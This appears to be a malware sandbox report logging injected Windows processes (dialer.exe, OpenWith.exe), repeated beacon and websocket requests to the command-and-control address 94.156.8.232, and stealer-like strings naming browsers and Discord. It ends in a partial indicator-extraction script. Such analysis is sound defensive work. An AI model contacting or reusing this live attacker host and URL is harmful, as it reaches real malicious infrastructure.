Source: |
Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831L source: OpenWith.exe, 00000003.00000002.3331408408.0000025B14E9A000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: wkernel32.pdb source: wdeeFKntav.exe, 00000000.00000003.2112932104.00000000046E0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2112870082.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115365389.0000000002D10000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115429018.0000000004E30000.00000004.00000001.00020000.00000000.sdmp |
Source: |
Binary string: wkernelbase.pdb source: wdeeFKntav.exe, 00000000.00000003.2113091379.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2113264458.00000000047E0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115786172.0000000004FD0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115566580.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: OpenWith.exe, 00000003.00000002.3331408408.0000025B14E9A000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: ntdll.pdb source: wdeeFKntav.exe, 00000000.00000003.2111775317.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2112323721.00000000047B0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2114700103.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2114865216.0000000004FA0000.00000004.00000001.00020000.00000000.sdmp |
Source: |
Binary string: wntdll.pdbUGP source: wdeeFKntav.exe, 00000000.00000003.2112545924.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2112684749.0000000004760000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115217738.0000000004F50000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115079095.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp |
Source: |
Binary string: ntdll.pdbUGP source: wdeeFKntav.exe, 00000000.00000003.2111775317.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2112323721.00000000047B0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2114700103.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2114865216.0000000004FA0000.00000004.00000001.00020000.00000000.sdmp |
Source: |
Binary string: wntdll.pdb source: wdeeFKntav.exe, 00000000.00000003.2112545924.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2112684749.0000000004760000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115217738.0000000004F50000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115079095.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp |
Source: |
Binary string: wkernelbase.pdbUGP source: wdeeFKntav.exe, 00000000.00000003.2113091379.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2113264458.00000000047E0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115786172.0000000004FD0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115566580.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp |
Source: |
Binary string: wkernel32.pdbUGP source: wdeeFKntav.exe, 00000000.00000003.2112932104.00000000046E0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2112870082.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115365389.0000000002D10000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115429018.0000000004E30000.00000004.00000001.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: OpenWith.exe, 00000003.00000002.3331408408.0000025B14E9A000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdbf source: OpenWith.exe, 00000003.00000002.3331408408.0000025B14E9A000.00000004.00000020.00020000.00000000.sdmp |
Source: global traffic |
HTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brCache-Control: max-age=0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36If-Match: "ete6WHCQjxNcNjY1jEgGnY3tc9nSpnEcXroCoa+G1jzhT02yKm+Udo9y++Tli4waAsLCo0lRivK7ZSYZE/haMgBlbi1DSA=="Connection: close |
Source: global traffic |
HTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: xU2b84xhXZbqQYI |
Source: global traffic |
HTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: RAgFd01qjbFHl5s |
Source: global traffic |
HTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: sW1tFC9u4h8HrYr |
Source: global traffic |
HTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: M8ftLICEWZ7XZ6c |
Source: global traffic |
HTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: Uu0iaFdbG5AryZb |
Source: global traffic |
HTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: wmg987RLpbyqFSI |
Source: global traffic |
HTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: Q3ZCdcjUNS1IbZW |
Source: global traffic |
HTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: YpfXF0WYwZtHMSW |
Source: global traffic |
HTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: gBYpLgo7UasXiuG |
Source: global traffic |
HTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: TYefaI1F0MWWonG |
Source: global traffic |
HTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: 2ku58F9dUSVrZha |
Source: global traffic |
HTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: kvd5dMCTf5mbuop |
Source: global traffic |
HTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: EbWxOS52DLQr2vF |
Source: global traffic |
HTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: f5cmLiHAmSPq8o0 |
Source: global traffic |
HTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: oqscagi87YhXdh9 |
Source: global traffic |
HTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: IDbbhmNh0FLcLVU |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.8.232 |
Source: global traffic |
HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.0Date: Thu, 23 May 2024 18:15:27 GMTContent-Length: 166Connection: close |
Source: global traffic |
HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.0Date: Thu, 23 May 2024 18:15:34 GMTContent-Length: 166Connection: close |
Source: global traffic |
HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.0Date: Thu, 23 May 2024 18:15:41 GMTContent-Length: 166Connection: close |
Source: global traffic |
HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.0Date: Thu, 23 May 2024 18:15:47 GMTContent-Length: 166Connection: close |
Source: global traffic |
HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.0Date: Thu, 23 May 2024 18:15:53 GMTContent-Length: 166Connection: close |
Source: global traffic |
HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.0Date: Thu, 23 May 2024 18:15:59 GMTContent-Length: 166Connection: close |
Source: global traffic |
HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.0Date: Thu, 23 May 2024 18:16:06 GMTContent-Length: 166Connection: close |
Source: global traffic |
HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.0Date: Thu, 23 May 2024 18:16:13 GMTContent-Length: 166Connection: close |
Source: global traffic |
HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.0Date: Thu, 23 May 2024 18:16:19 GMTContent-Length: 166Connection: close |
Source: global traffic |
HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.0Date: Thu, 23 May 2024 18:16:25 GMTContent-Length: 166Connection: close |
Source: global traffic |
HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.0Date: Thu, 23 May 2024 18:16:32 GMTContent-Length: 166Connection: close |
Source: global traffic |
HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.0Date: Thu, 23 May 2024 18:16:39 GMTContent-Length: 166Connection: close |
Source: global traffic |
HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.0Date: Thu, 23 May 2024 18:16:45 GMTContent-Length: 166Connection: close |
Source: global traffic |
HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.0Date: Thu, 23 May 2024 18:16:51 GMTContent-Length: 166Connection: close |
Source: global traffic |
HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.0Date: Thu, 23 May 2024 18:16:58 GMTContent-Length: 166Connection: close |
Source: global traffic |
HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.0Date: Thu, 23 May 2024 18:17:04 GMTContent-Length: 166Connection: close |
Source: dialer.exe, 00000002.00000002.2240294940.00000000026EC000.00000004.00000010.00020000.00000000.sdmp, OpenWith.exe, OpenWith.exe, 00000003.00000003.2318510901.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2352844205.0000025B16E37000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3331284161.0000025B14E20000.00000040.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2318168734.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2338132971.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2336471326.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2329383412.0000025B16E39000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2339567729.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2287231565.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3332371531.0000025B16E37000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319262155.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2324301600.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2322773513.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2327778333.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319977059.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2353100598.0000025B16E37000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://94.156.8.232/c1402fa62dc004/s209r0u5.lrdw9 |
Source: dialer.exe, 00000002.00000002.2241516364.0000000004D2F000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3331284161.0000025B14E20000.00000040.00000001.00020000.00000000.sdmp |
String found in binary or memory: https://94.156.8.232/c1402fa62dc004/s209r0u5.lrdw9kernelbasentdllkernel32GetProcessMitigationPolicyH |
Source: OpenWith.exe, 00000003.00000003.2318510901.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2352844205.0000025B16E37000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2318168734.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2338132971.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2336471326.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2329383412.0000025B16E39000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2339567729.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2287231565.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3332371531.0000025B16E37000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319262155.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2324301600.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2322773513.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2327778333.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319977059.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2353100598.0000025B16E37000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://94.156.8.232/c1402fa62dc004/s209r0u5.lrdw9x |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319841245.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319706890.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2320103191.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319572365.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2318779583.0000025B17023000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://ac.ecosia.org/autocomplete?q= |
Source: OpenWith.exe, 00000003.00000003.2318779583.0000025B17023000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319841245.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319706890.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2320103191.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319572365.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2318779583.0000025B17023000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319841245.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319706890.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2320103191.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319572365.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2318779583.0000025B17023000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= |
Source: OpenWith.exe, 00000003.00000003.2338930584.0000025B17012000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://discord.com |
Source: OpenWith.exe, 00000003.00000003.2338930584.0000025B17012000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://discordapp.com |
Source: OpenWith.exe, 00000003.00000003.2318779583.0000025B17023000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://duckduckgo.com/ac/?q= |
Source: OpenWith.exe, 00000003.00000003.2318779583.0000025B17023000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://duckduckgo.com/chrome_newtab |
Source: OpenWith.exe, 00000003.00000003.2318779583.0000025B17023000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= |
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319841245.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319706890.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2320103191.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319572365.0000025B17024000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2318779583.0000025B17023000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.ecosia.org/newtab/ |
Source: OpenWith.exe, 00000003.00000003.2318779583.0000025B17023000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico |
Source: unknown |
Network traffic detected: HTTP traffic on port 49708 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49722 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49710 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49699 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49721 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49720 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49719 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49720 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49722 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49719 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49718 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49713 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49717 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49715 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49716 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49715 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49717 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49714 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49713 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49711 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49709 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49699 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49710 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49707 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49711 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49721 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49723 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49709 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49708 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49707 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49716 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49714 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49718 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49723 |
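The string rows and the traffic rows above can be reduced to a short indicator list with a small script. The following is an added example, not part of the sandbox report; its REPORT text is an abridged copy of rows from the report, and two heuristics are the example's own: a URL that merely extends another one with non-URL characters (the `...lrdw9x` and `...lrdw9kernelbasentdll...` variants) is treated as a string-scanner over-read and folded onto the shorter URL, and port 443 is taken to be the server side of every traffic row.

```python
"""Reduce the string and traffic rows above to network indicators.

Added example, not part of the sandbox report. REPORT is an abridged copy of
rows from the report. Two heuristics are the example's own: a URL that merely
extends another one with non-URL characters is treated as a string-scanner
over-read and folded onto the shorter URL, and port 443 is taken to be the
server side of every traffic row.
"""
import re
from collections import defaultdict
from ipaddress import ip_address
from urllib.parse import urlsplit

REPORT = """\
Source: dialer.exe, 00000002.00000002.2240294940.00000000026EC000.00000004.00000010.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3331284161.0000025B14E20000.00000040.00000001.00020000.00000000.sdmp |
String found in binary or memory: https://94.156.8.232/c1402fa62dc004/s209r0u5.lrdw9 |
Source: dialer.exe, 00000002.00000002.2241516364.0000000004D2F000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://94.156.8.232/c1402fa62dc004/s209r0u5.lrdw9kernelbasentdllkernel32GetProcessMitigationPolicyH |
Source: OpenWith.exe, 00000003.00000003.2318510901.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://94.156.8.232/c1402fa62dc004/s209r0u5.lrdw9x |
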